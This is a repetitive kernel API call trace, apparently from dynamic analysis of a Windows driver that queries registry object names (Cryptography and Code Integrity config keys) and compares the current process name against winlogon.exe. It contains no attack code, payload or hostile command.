| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x84, ret_val_ptr_out = 0xffffe0003a77c910 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x82, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x82, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x84, ret_val_ptr_out = 0xffffe0003a77c910 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x82, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x82, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x84, ret_val_ptr_out = 0xffffe0003a77c910 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x82, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x82, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
